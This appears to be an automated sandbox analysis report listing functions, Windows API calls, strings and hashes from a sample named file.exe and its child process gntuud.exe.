Function 0041BA23 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0041BA18,0041F030,?,0041B9E0,0041BF66,?,0041F030), ref: 0041BA38
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041BA4B
FreeLibrary.KERNEL32(00000000,?,?,0041BA18,0041F030,?,0041B9E0,0041BF66,?,0041F030), ref: 0041BA6E

Strings

mscoree.dll, xrefs: 0041BA31
CorExitProcess, xrefs: 0041BA43

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: af14fd2dde53d7be7e540de01eeb28501674720f1683c90e0ca13ac16e635f3d
Instruction ID: ed62b177b772f88879a3613f9265b3cbba58386cad372b2ef282e3211ef706bb
Opcode Fuzzy Hash: af14fd2dde53d7be7e540de01eeb28501674720f1683c90e0ca13ac16e635f3d
Instruction Fuzzy Hash: A9F08C30601218FBDB259B50ED0ABEE7AB8EF04795F900171A900A11A0CB788E45DA98

Uniqueness

Uniqueness Score: -1.00%

Function 00427099 Relevance: 7.7, APIs: 5, Instructions: 244COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00708240,00708240,?,7FFFFFFF,?,?,00427355,00708240,00708240,?,00708240,?,?,?,?,00708240), ref: 0042713C
__alloca_probe_16.LIBCMT ref: 004271F2
__alloca_probe_16.LIBCMT ref: 00427288
__freea.LIBCMT ref: 004272F3
__freea.LIBCMT ref: 004272FF

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 91607b16f9be89b050216d0262b7a9086dcf85da4f2f58daa46203d23714b3eb
Instruction ID: bfb7b1dd4e6a372b6cac35a08abb23c860549cbbf22db091a49783f100598494
Opcode Fuzzy Hash: 91607b16f9be89b050216d0262b7a9086dcf85da4f2f58daa46203d23714b3eb
Instruction Fuzzy Hash: FE81B371B082259BDF219FA5AC41AEF7BB5AF09354F98009BFC04A7341D629DC41CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004259C4 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00425A48
__alloca_probe_16.LIBCMT ref: 00425B0E
__freea.LIBCMT ref: 00425B7A

Part of subcall function 0041EB6A: HeapAlloc.KERNEL32(00000000,?,?,?,004192B3,?,?,?,?,?,004020F3,?,?), ref: 0041EB9C

__freea.LIBCMT ref: 00425B83
__freea.LIBCMT ref: 00425BA6

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 0ed85803784aee2db6ff987fae84c9ab7c307a7471b8225ec02266551b54ed37
Instruction ID: 47cc4f1c59843cf0fdcde6a6466f15fccfb65284f69525d754585251a764c7c9
Opcode Fuzzy Hash: 0ed85803784aee2db6ff987fae84c9ab7c307a7471b8225ec02266551b54ed37
Instruction Fuzzy Hash: F8510772700626AFEB205F55EC81EBF3BA9EF44764F95026BFC04A7250D738EC518698

Uniqueness

Uniqueness Score: -1.00%

Function 0041C1EE Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0041C120), ref: 0041C210
GetFileInformationByHandle.KERNEL32(?,?), ref: 0041C26A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0041C120,?,000000FF,00000000,00000000), ref: 0041C2F8
__dosmaperr.LIBCMT ref: 0041C2FF
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0041C33C

Part of subcall function 0041C564: __dosmaperr.LIBCMT ref: 0041C599

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: 3230945f500916dbf2b30075e44dc4a54b8e48e7c690c80bea2aeb9dce7d3466
Instruction ID: 4e69e7e4d88eedad6c45f19224540fe4c6ef1bb07ae0a9dc76835222067d53ae
Opcode Fuzzy Hash: 3230945f500916dbf2b30075e44dc4a54b8e48e7c690c80bea2aeb9dce7d3466
Instruction Fuzzy Hash: F1414F76940248ABCB24DFA5DC859EFBBF9EF89300704852EF856D3610D7389885CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004223CC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004223E4

Part of subcall function 0041E681: HeapFree.KERNEL32(00000000,00000000,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?), ref: 0041E697
Part of subcall function 0041E681: GetLastError.KERNEL32(?,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?,?), ref: 0041E6A9

_free.LIBCMT ref: 004223F6
_free.LIBCMT ref: 00422408
_free.LIBCMT ref: 0042241A
_free.LIBCMT ref: 0042242C

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 075267f93e8c74a3d8c5d497b46571d251132de1e76aa07536fcf506e3494e09
Instruction ID: 06c163a86ce9bcf53bddb1e809bffc1f14a8d71068ad18bce2e552751ae1d238
Opcode Fuzzy Hash: 075267f93e8c74a3d8c5d497b46571d251132de1e76aa07536fcf506e3494e09
Instruction Fuzzy Hash: B5F04F32A41210BB8620EB66FAC2C4B73D9AA203117E5590AF804D7641CBBCFCC28A5C

Uniqueness

Uniqueness Score: -1.00%

Function 00420A99 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00420C33

Strings

*?, xrefs: 00420ADC

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: a5f4271a9b2cdd5577dd70bf982a91958e720cc1a31c28ea89b93a8b00f230c4
Instruction ID: a63c59b0d7da49b05f07040cb4a194fc74b471ca4969d8fc6594f89651597fee
Opcode Fuzzy Hash: a5f4271a9b2cdd5577dd70bf982a91958e720cc1a31c28ea89b93a8b00f230c4
Instruction Fuzzy Hash: 376160B5E002299FCB24CF99D8815EEFBF5EF48314B64416AE815F7301D739AE418B94

Uniqueness

Uniqueness Score: -1.00%

Function 004199B0 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00419A77
___AdjustPointer.LIBCMT ref: 00419A9A
___AdjustPointer.LIBCMT ref: 00419B36

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: cb4a7085a66beb1c6e7fab14160a01cb6a78009793b043dfba62bed1ac9d92c0
Instruction ID: d148374ac9c33eb5af7e197456be07967fb5ffa3c7fa52c118e22ba4f2cbab34
Opcode Fuzzy Hash: cb4a7085a66beb1c6e7fab14160a01cb6a78009793b043dfba62bed1ac9d92c0
Instruction Fuzzy Hash: C2510072A05286AFDB288F55D861BEB73A4FF00354F28402FE80647291E739EDC5C799

Uniqueness

Uniqueness Score: -1.00%

Function 00425FFE Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004260CE
_free.LIBCMT ref: 004260F7
SetEndOfFile.KERNEL32(00000000,0042362D,00000000,0041E51E,?,?,?,?,?,?,?,0042362D,0041E51E,00000000), ref: 00426129
GetLastError.KERNEL32(?,?,?,?,?,?,?,0042362D,0041E51E,00000000,?,?,?,?,00000000), ref: 00426145

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 167a3e30cb9c8467b9bf976be958464019683cdbe52ebb463a7985f70ac973ea
Instruction ID: 1b0f2aef12d2ca725aa682019014df6231c69ba655f1b492b921229f4394e9e8
Opcode Fuzzy Hash: 167a3e30cb9c8467b9bf976be958464019683cdbe52ebb463a7985f70ac973ea
Instruction Fuzzy Hash: 0B412C32B001209BDB11AFB5EC41B9E3765EF04364FA61117F814E7292D73CD851976C

Uniqueness

Uniqueness Score: -1.00%

Function 004209CA Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 0041BE4F: _free.LIBCMT ref: 0041BE5D

Part of subcall function 004219A1: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00425B70,?,00000000,00000000), ref: 00421A43

GetLastError.KERNEL32 ref: 00420A32
__dosmaperr.LIBCMT ref: 00420A39
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00420A78
__dosmaperr.LIBCMT ref: 00420A7F

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: e7412a325b98ed2ffd5721f9c1498328346c4b6dd7362b7b088218a3a2378de7
Instruction ID: a194d0f24e8f29cf6dc2264e026a9bddb0740e8876572cad8ab677f0b0fd6e86
Opcode Fuzzy Hash: e7412a325b98ed2ffd5721f9c1498328346c4b6dd7362b7b088218a3a2378de7
Instruction Fuzzy Hash: 4C21A771700329AF9B20AF66ACC186BB7ECEF103687D0452AF92997252D738DC418799

Uniqueness

Uniqueness Score: -1.00%

Function 0041EF74 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?,0041BDCD,00000000,?,?,?,0041BF66,?), ref: 0041EF79
_free.LIBCMT ref: 0041EFD6
_free.LIBCMT ref: 0041F00C
SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,?,0041BF66,?), ref: 0041F017

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 302acc0bf53bd1f73a2755a45742a3073c62e77b026997c6a60da626665553b8
Instruction ID: 95c26f371b7850b2bddc85ae7a4fd83e17c88bc25bbbbd0a2489a901185ef23c
Opcode Fuzzy Hash: 302acc0bf53bd1f73a2755a45742a3073c62e77b026997c6a60da626665553b8
Instruction Fuzzy Hash: 8B110A362042127A96102B7BACC1DEB19699BC1378775013BFD2A822D2EE6D8CDB511C

Uniqueness

Uniqueness Score: -1.00%

Function 0041F0CB Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0041C835,0041EBAD,?,?,004192B3,?,?,?,?,?,004020F3,?,?), ref: 0041F0D0
_free.LIBCMT ref: 0041F12D
_free.LIBCMT ref: 0041F163
SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,004192B3,?,?,?,?,?,004020F3,?,?), ref: 0041F16E

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 4bcf8054320003d779143fd0f4fcbf11e89a46cf80e0e609b1592b705702cf10
Instruction ID: 43f7999f07bdf9caa0489b11563b1ed73c9ba6fe2d35dc558eaeab45f7604291
Opcode Fuzzy Hash: 4bcf8054320003d779143fd0f4fcbf11e89a46cf80e0e609b1592b705702cf10
Instruction Fuzzy Hash: EC114C32200202BAC710267AECC5DEF266997C5778771023BF92A822D2EE6C8CDF411C

Uniqueness

Uniqueness Score: -1.00%

Function 0041F8AD Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0041FA12,00000000,?,0042473A,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0041F8C3
GetLastError.KERNEL32(?,0042473A,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0041FA12,00000000,00000104,?), ref: 0041F8CD
__dosmaperr.LIBCMT ref: 0041F8D4

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: a32e98b3cc518d6611017c09f407fb25a1ea39571fe78292492d3cfee0b11311
Instruction ID: 803fc007063167f67073d72d48b77dd8b306300581abe4bc3ca65f7a6a8e9d61
Opcode Fuzzy Hash: a32e98b3cc518d6611017c09f407fb25a1ea39571fe78292492d3cfee0b11311
Instruction Fuzzy Hash: 19F01232700115BB8B206BA6DD0499BBF69FF443A43504536F51DC6121DB35E8A7D7D4

Uniqueness

Uniqueness Score: -1.00%

Function 0041F916 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0041FA12,00000000,?,004246C5,00000000,00000000,0041FA12,?,?,00000000,00000000,00000001), ref: 0041F92C
GetLastError.KERNEL32(?,004246C5,00000000,00000000,0041FA12,?,?,00000000,00000000,00000001,00000000,00000000,?,0041FA12,00000000,00000104), ref: 0041F936
__dosmaperr.LIBCMT ref: 0041F93D

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: de22d5bbe60f73852fa7c7c3b833e9708c9e2b0bf73d21007ae8885001f27472
Instruction ID: 37d27302a1a2eca8b092f01353d8cc03fb9fecfc19a8c04071e9600c3881e131
Opcode Fuzzy Hash: de22d5bbe60f73852fa7c7c3b833e9708c9e2b0bf73d21007ae8885001f27472
Instruction Fuzzy Hash: 66F06271200515BB8B206BA2CD04E97BFA9FF443A03404536F51DC6120CB35E8A7CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 004273BF Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(004058A0,0000000F,00437A38,00000000,004058A0,?,00426AD7,004058A0,00000001,004058A0,004058A0,?,00423EFD,00000000,?,004058A0), ref: 004273D6
GetLastError.KERNEL32(?,00426AD7,004058A0,00000001,004058A0,004058A0,?,00423EFD,00000000,?,004058A0,00000000,004058A0,?,00424451,004058A0), ref: 004273E2

Part of subcall function 004273A8: CloseHandle.KERNEL32(FFFFFFFE,004273F2,?,00426AD7,004058A0,00000001,004058A0,004058A0,?,00423EFD,00000000,?,004058A0,00000000,004058A0), ref: 004273B8

___initconout.LIBCMT ref: 004273F2

Part of subcall function 0042736A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00427399,00426AC4,004058A0,?,00423EFD,00000000,?,004058A0,00000000), ref: 0042737D

WriteConsoleW.KERNEL32(004058A0,0000000F,00437A38,00000000,?,00426AD7,004058A0,00000001,004058A0,004058A0,?,00423EFD,00000000,?,004058A0,00000000), ref: 00427407

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 654839e4b531a485c8561e35f9c6b1b80fe1c4fa203d6a6e5454fb2027dc39d5
Instruction ID: f4aa61af986e557aabc683dea4287ad527f4dae7078adb09fe65b6480a605f88
Opcode Fuzzy Hash: 654839e4b531a485c8561e35f9c6b1b80fe1c4fa203d6a6e5454fb2027dc39d5
Instruction Fuzzy Hash: 0DF01236200128BBCF222F95EC0598A3F66FF09761B814035FE1885221D6328861DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004168D0 Relevance: 6.0, APIs: 4, Instructions: 27threadsleepCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 004168E6
CreateThread.KERNEL32 ref: 004168F7
CreateThread.KERNEL32 ref: 00416908
Sleep.KERNEL32(00007530,?,00416963), ref: 00416915

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: CreateThread$Sleep
String ID:
API String ID: 422425972-0
Opcode ID: 341ff27edc9d80adde49285ccd53ede86e99968b94c227c8f2cb1043e662c4d8
Instruction ID: 510d45b7b4832c20ba14fd4772b7373e315d1c5f6d293ea37511ad809640c0fb
Opcode Fuzzy Hash: 341ff27edc9d80adde49285ccd53ede86e99968b94c227c8f2cb1043e662c4d8
Instruction Fuzzy Hash: 7EE06C31BE9324B2F07066A01C03F891A549B09FA1F720023B70C7E0D089D8748A8AAE

Uniqueness

Uniqueness Score: -1.00%

Function 0041D8F9 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041D902

Part of subcall function 0041E681: HeapFree.KERNEL32(00000000,00000000,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?), ref: 0041E697
Part of subcall function 0041E681: GetLastError.KERNEL32(?,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?,?), ref: 0041E6A9

_free.LIBCMT ref: 0041D915
_free.LIBCMT ref: 0041D926
_free.LIBCMT ref: 0041D937

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9b2601ed83b24476e775deb93b8458d54ddcb24acc698b66a9a1fc18dcbebf7a
Instruction ID: 6025c10385c71f7bb96e721290e2dad06e9e38842dd47ad59e1a15c00094ce58
Opcode Fuzzy Hash: 9b2601ed83b24476e775deb93b8458d54ddcb24acc698b66a9a1fc18dcbebf7a
Instruction Fuzzy Hash: 06E09A75C806209BCA016F17BD559953BA1EB647943C2312AF95056232CB3905739ECE

Uniqueness

Uniqueness Score: -1.00%

Function 0041CF68 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\file.exe, xrefs: 0041CFAB, 0041CFB2, 0041CFE8

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\file.exe
API String ID: 0-1957095476
Opcode ID: 65df9d79a2b58a2bcb442e045a2e55a5d5cadb832709df36d6bb0dd23eeaec09
Instruction ID: 9698455488551ced2192efa7f0ee548952e5698eb24d3f820b7e273d75b3104a
Opcode Fuzzy Hash: 65df9d79a2b58a2bcb442e045a2e55a5d5cadb832709df36d6bb0dd23eeaec09
Instruction Fuzzy Hash: 0441A2B1E40214AFCB11DF9ADCC1AEFBBB8EB99314F10006BE50597251D7789E82CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00419FBD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00419FE2

Strings

MOC, xrefs: 00419FF4
RCC, xrefs: 00419FFC

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: fe181e87282fc2e584b97ba42ad5619de0411f45fb7367d9aab1208c3783a3e4
Instruction ID: b55e6041155ecd8fb66803e6bd24d0423a012c2324726995748e47be6f979120
Opcode Fuzzy Hash: fe181e87282fc2e584b97ba42ad5619de0411f45fb7367d9aab1208c3783a3e4
Instruction Fuzzy Hash: 3C416C72A00209EFCF15DF94CD81AEEBBB5FF48304F18805AF90467251D33999A0DB56

Uniqueness

Uniqueness Score: -1.00%

Function 00412DB5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00412DCE

Strings

., xrefs: 00412E83
5120, xrefs: 00412E17

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: .$5120
API String ID: 514040917-2446372808
Opcode ID: 288dbf1ff717b3effbb29f942bdd3f648585338554576630b94e0c9c66201538
Instruction ID: 028e71521c6590f82ff7af423b4cde0d22ea1461aa592c587eec63fda8d9010e
Opcode Fuzzy Hash: 288dbf1ff717b3effbb29f942bdd3f648585338554576630b94e0c9c66201538
Instruction Fuzzy Hash: 4621B2B09053589BDB14EF24C91A7DD7FB8AB06358F5001CEE44967282D7B89B498BE3

Uniqueness

Uniqueness Score: -1.00%

Function 00423A09 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041FED4: EnterCriticalSection.KERNEL32(004058A0,?,00424305,004058A0,00437D58,00000010,0041EAF1,00000000,C032C301,0000000F,0000000F,004058A0,?,0041BBFA,004058A0,0000000F), ref: 0041FEEF

FlushFileBuffers.KERNEL32(00000000,00437D38,0000000C,00423B10,NA,?,00000001,?,0041EA4E,?), ref: 00423A52
GetLastError.KERNEL32 ref: 00423A63

Strings

NA, xrefs: 00423A8A

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: BuffersCriticalEnterErrorFileFlushLastSection
String ID: NA
API String ID: 4109680722-827283589
Opcode ID: 602f8a61e0176b0b3c43f70f4b5149247446a1d0a1bb3b3bcfd5d853c74da7d4
Instruction ID: ff259a8a86f6791cd3d56539a9f5b8e5d03a9a6f044a9d5d94d641c3aaafe980
Opcode Fuzzy Hash: 602f8a61e0176b0b3c43f70f4b5149247446a1d0a1bb3b3bcfd5d853c74da7d4
Instruction Fuzzy Hash: D601C072B002108FC710AFA9E84569E7BB1EF48725F50412FF4519B3E2DB7C9942CB58

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: gntuud.exePID: 6036, Parent PID: 1088COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	35.4%
Signature Coverage:	0%
Total number of Nodes:	212
Total number of Limit Nodes:	16

Executed Functions

Function 00406F30 Relevance: 23.6, APIs: 15, Instructions: 1118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7d2803523c5be3f1a3d33093ed18ab668b5497d02f51594895b22345df41966
Instruction ID: 22fe206b34a867f9c0c4be84b5a89d407671101fea83816f4ebb55b4962a653a
Opcode Fuzzy Hash: a7d2803523c5be3f1a3d33093ed18ab668b5497d02f51594895b22345df41966
Instruction Fuzzy Hash: 36920870E042089BEB14DFA8CA497DEBBB1EF45314F64426ED410773C2D7795A84CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0041B9E1 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(0041F030,?,0041B9E0,0041BF66,?,0041F030,0041BF66,0041F030), ref: 0041BA03
TerminateProcess.KERNEL32(00000000,?,0041B9E0,0041BF66,?,0041F030,0041BF66,0041F030), ref: 0041BA0A
ExitProcess.KERNEL32 ref: 0041BA1C

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 3d3398b3f9dcf73c51e1cd00535af5d0e13f2263922661259b1695b405c8b0d4
Instruction ID: be758b5f3a38b2d93a3fbedb321d5b13915e36e10b2adafe3a414c7c05e9fbd7
Opcode Fuzzy Hash: 3d3398b3f9dcf73c51e1cd00535af5d0e13f2263922661259b1695b405c8b0d4
